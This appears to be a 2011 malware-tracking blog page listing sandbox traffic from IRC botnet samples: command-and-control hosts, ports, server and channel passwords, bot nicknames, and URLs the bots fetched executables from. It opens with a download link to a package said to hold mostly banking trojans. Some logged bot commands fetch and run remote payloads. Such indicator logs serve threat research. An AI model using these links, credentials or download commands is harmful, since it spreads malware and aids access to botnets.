Month: May 2011

This package is around 36mb inside mostly banking trojans have fun searching Download: http://91a81406.tubeviral.com

DNS: ng.marketallone.com api.wipmania.com ng.themarketbaby.com ng.grasshopperz11.com Resolved : [ng.grasshopperz11.com] To [123.183.217.32] Resolved : [ng.grasshopperz11.com] To [60.190.218.104] Resolved : [ng.grasshopperz11.com] To [59.63.157.62] Resolved : [ng.grasshopperz11.com] To [59.53.91.167] Resolved : [ng.grasshopperz11.com] To [60.190.223.125] Resolved : [ng.marketallone.com] To [60.190.223.125] Resolved : [ng.marketallone.com] To [59.63.157.62] Resolved : [ng.marketallone.com] To [60.190.218.104] Resolved : [ng.marketallone.com] To [123.183.217.32] Resolved : [ng.marketallone.com] To [59.53.91.167]Read more...

Remote Host Port Number 65.75.118.255 6667 USER soPSBDC47KHWcwuYTIVTwULhg8Msu7QbPef8Dja8Xt3rMvPBAkRtBrcrOj7gHNQ * * :gojMH85IxP3Molq JOIN #lobby USER bkqLycUpRpeCLWzJjgM * * :CG9IjLmh1q6GovTy7ZXg NICK UYeyOjxZgUqXQ PONG :5D8B0395 NICK kkvnH9rusO PONG :8020ECE6 USER l1iI4EoH4633GZO9DFuPsDD * * :QAKmwLIbxRK NICK k8rRRCahEHgwb5hP PONG :171C849A hosting infos: http://whois.domaintools.com/65.75.118.255

Remote Host Port Number 195.122.131.6 80 208.75.230.43 80 213.251.170.52 80 204.15.252.199 49287(ircd here) * The data identified by the following URLs was then requested from the remote web server: o http://rapidshare.com/files/936250907/lol.txt o http://www.freewebtown.com/nazmi/biz.exe o http://api.wipmania.com/ hosting infos: http://whois.domaintools.com/204.15.252.199

Remote Host Port Number 208.75.230.43 80 61.31.99.67 4042 NICK new[USA|XP|COMPUTERNAME]dyaamkn USER hh “” “lol” :hh JOIN #newbiz# PONG 422 NICK new[USA|XP|COMPUTERNAME]arfjwyo USER hh “” “lol” :hh JOIN #newgen# PONG 422 * The data identified by the following URL was then requested from the remote web server: o http://www.freewebtown.com/nazmi/ass.exe hosting infos: http://whois.domaintools.com/61.31.99.67

Remote Host Port Number stolen.wshells.ws 3211 PASS google_cache2.tmp NICK [DvLz-USA|XP]062652 USER 0626 “” “TsGh” :0626 JOIN #DvLz DvLz# NICK n[DvLz-USA|XP]737534 USER 4207 “” “TsGh” :4207 NICK [DvLz-USA|XP]976295 USER 9762 “” “TsGh” :9762 * The data identified by the following URL was then requested from the remote web server: o http://perfectteam.org/nosferatus/Crypter/taskhostt.exe hosting infos: http://whois.domaintools.com/208.98.26.140

Remote Host Port Number 216.45.58.150 80 72.20.30.22 5900 PASS Virus NICK VirUs-sgpzxuis USER VirUs “” “usk” : 2DIE 3FUCKER. JOIN #B5# Virus PONG :TESTING.STUFF.HERE UPDATE: NICK VirUs-fxpjhnff USER VirUs “” “byy” : 8Coded 8Ahmed.Ramzey@Hotmail.Com.. JOIN #Rana1# Virus PONG :TESTING.STUFF.HERE hosting infos: http://whois.domaintools.com/72.20.30.22

Resolved : [irc.chimon.us] To [46.21.169.42] Resolved : [irc.chimon.us] To [67.202.109.136] 46.21.169.42:6567 Nick: [SI|AUT|00|P|40016] Username: XP-6988 Server Pass: s1m0n3t4 Joined Channel: #sev# with Password c1rc0dusoleil Channel Topic for Channel #sev#: “.desfi http://img103.herosh.com/2011/05/17/385482491.gif c:WINDOWSwindi.exe 1” Private Message to Channel #sev#: “[Dl]: Created process: “c:WINDOWSwindi.exe”, PID: “ Private Message to Channel #sev#: “[Dl]: File download: 80.0KB to: c:WINDOWSwindi.exeRead more...

Remote Host Port Number ngme.drwhox.com:5101 possible dns : ngme.yourwebfind.com 123.183.217.32 5101 PASS hax0r(ircd here) 213.251.170.52 80 31.184.237.43 80 60.190.223.125 6943 PASS laorosr(ircd here) PRIVMSG #on :[d=”http://31.184.237.43/0481.exe” s=”60779 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 MODE [N00_USA_XP_1567294] @ -ix * The data identified by the following URLs was then requested from theRead more...

Remote Host Port Number 204.0.5.41 80 216.178.38.224 80 63.135.80.46 80 69.171.224.14 80 205.234.129.250 2866 PASS xxx NICK NEW-[USA|00|P|16653] USER XP-6905 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|16653] -ix JOIN #!nine! test PONG 22 MOTD hosting infos: http://whois.domaintools.com/205.234.129.250